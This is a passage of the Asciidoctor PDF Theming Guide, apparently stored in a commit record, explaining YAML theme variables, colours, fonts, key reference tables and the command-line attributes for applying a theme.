1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a key feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* line_height (currently some exceptions)\n* text_transform (only for headings)\n* margin_bottom (falls back to $vertical_rhythm)\n\n.Heading Inheritance\n****\nHeadings are special in that they inherit starting from a specific heading level (e.g., `heading_font_size_h2`) to the heading category (e.g., `heading_font_size`) and then directly to the base value (e.g., `base_font_size`), skipping any enclosing context.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `$sidebar_title_font_color`.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your (very patriotic) brand colors:\n\n[source,yaml]\n----\nbrand:\n red: #E0162B\n white: #FFFFFF\n blue: #0052A5\n----\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: $brand_blue\n----\n\n=== Math expressions & functions\n\nThe theme language supports basic math operations to support calculated values.\nThe following table lists the supported operations and the corresponding operator for each.\n\n[%header%autowidth]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nNOTE: Like programming languages, multiple and divide take precedence over add and subtract.\n\nThe operator must always be surrounded by a space on either side.\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nHowever, us humans like to think in real world units like inches (in), centimeters (cm) or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[%header%autowidth]\n|===\n|Unit |Suffix\n\n|Inches\n|in\n\n|Centimeter\n|cm\n\n|Millimeter\n|mm\n\n|Points\n|pt\n|===\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`.\n+\nThe special value `transparent` indicates that a color should not be used.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`).\n\nThe following are all equivalent values for the color red:\n\n[%autowidth,cols=4]\n|===\n|f00\n|#f00\n|ff0000\n|#ff0000\n|F00\n|#F00\n|FF0000\n|#FF0000\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\nIt's also possible to specify no color by assigning the special value `transparent` as shown here:\n\n[source,yaml]\n----\nbase:\n background_color: transparent\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages are currently resolved relative to the value of the `pdf-stylesdir` attribute.\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) is not supported.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle_page:\n background_image: title-cover.png\n----\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle_page:\n background_image: image:title-cover.png[]\n----\n\nLike in the AsciiDoc syntax, the inline image macro allows you to supply set the width of the image and the alignment:\n\n[source,yaml]\n----\ntitle_page:\n logo_image: image:logo.png[width=250,align=center] \n----\n\n== Fonts\n\nYou can select from <<built-in-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\n=== Built-in fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[%header%autowidth]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters that you use in your document are limited to the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\nAny characters in your AsciiDoc document that cannot be encoded will be replaced with an underscore (`_`).\n\n=== Bundled fonts\n\nAsciidoctor PDF bundles several fonts that are used in the default theme.\nYou can also use these fonts in your custom theme.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8.\n\nThe family name of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[NotoSerif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[Mplus1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circuled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[Mplus1pMultilingual]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUseful as a fallback font.\n\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you define your own custom fonts.\nThis limitation may be lifted in the future.\n\n=== Custom fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a collection of TTF file of the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font that is not italic like a browser can._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key you gave to the font in the font catalog anywhere a `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n RobotoLight:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\n=== Fallback fonts\n\nIf one of your fonts is missing a character that is used in a document, such as special symbols, you can tell Asciidoctor PDF to retrieve the character from a fallback font.\nYou only need to specify one fallback font...typically one that has a full set of symbols.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/android.googlesource.com\/platform\/frameworks\/base\/+\/master\/data\/fonts\/[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, assign the key to the `fallbacks` key under the `font_catalog` key.\nBe sure to surround the key name in square brackets as shown below.\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks: [DroidSansFallback]\n----\n\nTIP: If you are using more than one fallback font, separate each key name by a comma.\n\nThat's it!\nNow you're covered.\nYou don't need to reference the fallback font anywhere else in your theme file to use it.\n\nCAUTION: Using a fallback font does slow down PDF generation slightly.\nIt's best to select fonts that have all the characters you need.\n\n== Keys\n\nTBW\n\n=== Page\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|page_background_color\n|<<colors,color>>\n|background_color: ffffff\n\n|page_layout\n|portrait, landscape\n|layout: portrait\n\n|page_margin\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|margin: [0.5in, 0.67in, 0.67in, 0.67in]\n\n|page_size\n|named size, <<measurement-units,measurement array [width, height]>>\n|size: Letter\n|===\n\n=== Base\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|base_font_color\n|<<colors,color>>\n|font_color: #333333\n\n|base_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|base_font_size\n|<<values,number>>\n|font_size: 10.5\n\n|base_line_height_length\n|<<values,number>>\n|line_height_length: 12\n\n|base_line_height\n|<<values,number>>\n|line_height: 1.14\n\n|base_font_size_large\n|<<values,number>>\n|font_size_large: 13\n\n|base_font_size_small\n|<<values,number>>\n|font_size_small: 9\n\n|base_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n\n|base_align\n|left, center, right, justify\n|align: justify\n\n|base_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|base_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|base_border_color\n|<<colors,color>>\n|border_color: eee\n|===\n\n=== Vertical and horizontal rhythm\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|vertical_rhythm\n|<<values,number>>\n|vertical_rhythm: 12\n\n|horizontal_rhythm\n|<<values,number>>\n|horizontal_rhythm: 12\n|===\n\n=== Link\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|link_font_color\n|<<colors,color>>\n|font_color: 428BCA\n\n|link_font_family\n|<<fonts,font family name>>\n|font_family: Roboto\n\n|link_font_size\n|<<values,number>>\n|font_size: 9\n\n|link_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n|===\n\n=== Literal inline\n\nThe literal key is used for inline monospaced text in prose and table cells.\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|literal_font_color\n|<<colors,color>>\n|font_color: B12146\n\n|literal_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|literal_font_size\n|<<values,number>>\n|font_size: 12\n\n|literal_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n|===\n\n=== Heading\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|heading_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|heading_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|heading_font_size\n|<<values,number>>\n|font_size: 9\n\n|heading_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|heading_h<n>_font_color^[1]^\n|<<colors,color>>\n|h2_font_color: [0, 99%, 100%, 0]\n\n|heading_h<n>_font_family^[1]^\n|<<fonts,font family name>>\n|h4_font_family: Roboto\n\n|heading_h<n>_font_size^[1]^\n|<<values,number>>\n|h6_font_size: round($base_font_size * 1.7)\n\n|heading_h<n>_font_style^[1]^\n|normal, italic, bold, bold_italic\n|h3_font_style: bold_italic\n\n|heading_line_height\n|<<values,number>>\n|line_height: 1.2\n\n|heading_margin_top\n|<<measurement-units,measurement>>\n|margin_top: $vertical_rhythm * 0.2\n\n|heading_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 9.600\n|===\n\n^[1]^ `<n>` may be a number ranging from 1 to 6, representing each of the six heading levels.\n\n=== Title page\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|title_page_align\n|left, center, right, justify\n|align: right\n\n|title_page_title_top\n|percentage\n|title_top: 55%\n\n|title_page_title_font_size\n|<<values,number>>\n|title_font_size: 27\n\n|title_page_title_font_color\n|<<colors,color>>\n|title_font_color: 999999\n\n|title_page_title_line_height\n|<<values,number>>\n|title_line_height: 0.9\n\n|title_page_subtitle_font_size\n|<<values,number>>\n|subtitle_font_size: 18\n\n|title_page_subtitle_font_style\n|normal, italic, bold, bold_italic\n|subtitle_font_style: bold_italic\n\n|title_page_subtitle_line_height\n|<<values,number>>\n|subtitle_line_height: 1\n\n|title_page_authors_margin_top\n|<<measurement-units,measurement>>\n|authors_margin_top: 13.125\n\n|title_page_authors_font_size\n|<<values,number>>\n|authors_font_size: $base_font_size_large\n\n|title_page_authors_font_color\n|<<colors,color>>\n|authors_font_color: 181818\n\n|title_page_revision_margin_top\n|<<measurement-units,measurement>>\n|revision_margin_top: 13.125\n|===\n\n=== Block\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|block_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [12, 15, 12, 15]\n\n|block_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 0\n\n|block_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 1\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"1a,1a,1a\", grid=none, frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n=== Caption\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|caption_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|caption_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|caption_font_size\n|<<values,number>>\n|font_size: 11\n\n|caption_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|caption_align\n|left, center, right, justify\n|align: left\n\n|caption_margin_inside\n|<<measurement-units,measurement>>\n|margin_inside: 3\n\n|caption_margin_outside\n|<<measurement-units,measurement>>\n|margin_outside: 0\n|===\n\n=== Code\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|code_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|code_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|code_font_size\n|<<values,number>>\n|font_size: 11\n\n|code_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|code_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: 11\n\n|code_line_height\n|<<values,number>>\n|line_height: 1.25\n\n|code_background_color\n|<<colors,color>>\n|background_color: F5F5F5\n\n|code_border_color\n|<<colors,color>>\n|border_color: CCCCCC\n\n|code_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|code_border_width\n|<<values,number>>\n|border_width: 0.75\n|===\n\n=== Blockquote\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|blockquote_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|blockquote_font_family\n|<<fonts,font family name>>\n|font_family: Notoserif\n\n|blockquote_font_size\n|<<values,number>>\n|font_size: 13\n\n|blockquote_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|blockquote_border_width\n|<<values,number>>\n|border_width: 5\n\n|blockquote_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|blockquote_cite_font_size\n|<<values,number>>\n|cite_font_size: 9\n\n|blockquote_cite_font_color\n|<<colors,color>>\n|cite_font_color: 999999\n\n|blockquote_cite_font_family\n|<<fonts,font family name>>\n|cite_font_family: Notoserif\n\n|blockquote_cite_font_style\n|normal, italic, bold, bold_italic\n|cite_font_style: bold\n\n|===\n\n=== Sidebar\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|sidebar_border_color\n|<<colors,color>>\n|border_color: FFFFFF\n\n|sidebar_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|sidebar_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|sidebar_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|sidebar_title_font_color\n|<<colors,color>>\n|title_font_color: 333333\n\n|sidebar_title_font_family\n|<<fonts,font family name>>\n|title_font_family: NotoSerif\n\n|sidebar_title_font_size\n|<<values,number>>\n|title_font_size: 13\n\n|sidebar_title_font_style\n|normal, italic, bold, bold_italic\n|title_font_style: bold\n\n|sidebar_title_align\n|left, center, right, justify\n|title_align: center\n|===\n\n=== Example\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|example_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|example_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|example_border_width\n|<<values,number>>\n|border_width: 0.75\n\n|example_background_color\n|<<colors,color>>\n|background_color: transparent\n|===\n\n=== Admonition\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|admonition_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|admonition_border_width\n|<<values,number>>\n|border_width: 0.5\n|===\n\n=== Image\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|image_align_default\n|left, center, right, justify\n|align_default: left\n|===\n\n=== Lead\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|lead_font_size\n|<<values,number>>\n|font_size: 13\n\n|lead_line_height\n|<<values,number>>\n|line_height: 1.4\n|===\n\n=== Abstract\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|abstract_font_color\n|<<colors,color>>\n|font_color: 5C6266\n\n|abstract_font_size\n|<<values,number>>\n|font_size: 13\n\n|abstract_line_height\n|<<values,number>>\n|line_height: 1.4\n\n|abstract_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n|===\n\n=== Thematic break\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|thematic_break_border_color\n|<<colors,color>>\n|border_colorL EEEEEE\n\n|thematic_break_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 6\n\n|thematic_break_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 18\n|===\n\n=== Description list\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|description_list_term_font_style\n|normal, italic, bold, bold_italic\n|term_font_style: italic\n\n|description_list_description_indent\n|<<values,number>>\n|description_indent: 15\n|===\n\n\n=== Outline list\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|outline_list_indent\n|<<measurement-units,measurement>>\n|list_indent: 40\n\n|outline_list_item_spacing\n|<<measurement-units,measurement>>\n|item_spacing: 4\n|===\n\n=== Table\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|table_background_color\n|<<colors,color>>\n|background_color: FFFFFF\n\n|table_even_row_background_color\n|<<colors,color>>\n|even_row_background_color: F9F9F9\n\n|table_foot_background_color\n|<<colors,color>>\n|foot_background_color: F0F0F0\n\n|table_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|table_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|table_cell_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|cell_padding: [3, 3, 6, 3]\n|===\n\n[[key-toc]]\n=== Table of contents\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|toc_dot_leader_content\n|double-quoted string\n|dot_leader_content: \". \"\n\n|toc_dot_leader_color\n|<<colors,color>>\n|dot_leader_color: 999999\n\n|toc_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|toc_h<n>_font_color\n|<<colors,color>>\n|h3_font_color: 999999\n\n|toc_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|toc_font_size\n|<<values,number>>\n|font_size: 9\n\n|toc_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|toc_line_height\n|number\n|line_height: 1.5\n\n|toc_indent\n|<<measurement-units,measurement>>\n|indent: 20\n\n|toc_margin_top\n|<<measurement-units,measurement>>\n|indent: 20\n|===\n\n=== Running header & footer\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|header_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|header_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|header_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|header_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|header_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|header_font_size\n|<<values,number>>\n|font_size: 9\n\n|header_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|header_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|header_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|header_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|header_valign\n|top, center, bottom\n|valign: center\n\n|header_<side>_content_<align>^[1]^\n|quoted string\n|right: '\\{page-number}'\n\n|footer_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|footer_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|footer_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|footer_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|footer_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|footer_font_size\n|<<values,number>>\n|font_size: 9\n\n|footer_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|footer_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|footer_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|footer_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|footer_valign\n|top, center, bottom\n|valign: top\n\n|footer_<side>_content_<align>^[1]^\n|quoted string\n|center: '\\{page-number}'\n|===\n\n^[1]^ `<side>` can be `recto` (odd pages) or `verso` (even pages).\n`<align>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer, respectively, or it will not be shown.\n\nNOTE: The background color spans the width of the page.\nWhen a background color is specified, the border also spans the width of the page.\n\n==== Implicit attributes\n\nIn addition to the document-level attributes defined in the AsciiDoc document, the following attributes are available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nHere's an example that shows how these attributes can be used in the running footer:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n recto_content:\n right: '{section-or-chapter-title} | {page-number}'\n verso_content:\n left: '{page-number} | {chapter-title}'\n----\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running header (which also applies for the footer).\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n image_valign: 2 # <1>\n recto_content:\n center: image:footer-logo.png[width=80]\n verso_content:\n center: $footer_recto_content_center\n----\n<1> You can use the `footer_valign` attribute to slighly nudge the image up or down.\n\nCAUTION: The image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the width attribute accordingly.\n\n== Applying your theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n","old_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux>\n:toc: macro\n:icons: font\n:idprefix:\n:idseparator: -\n:window: _blank\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted 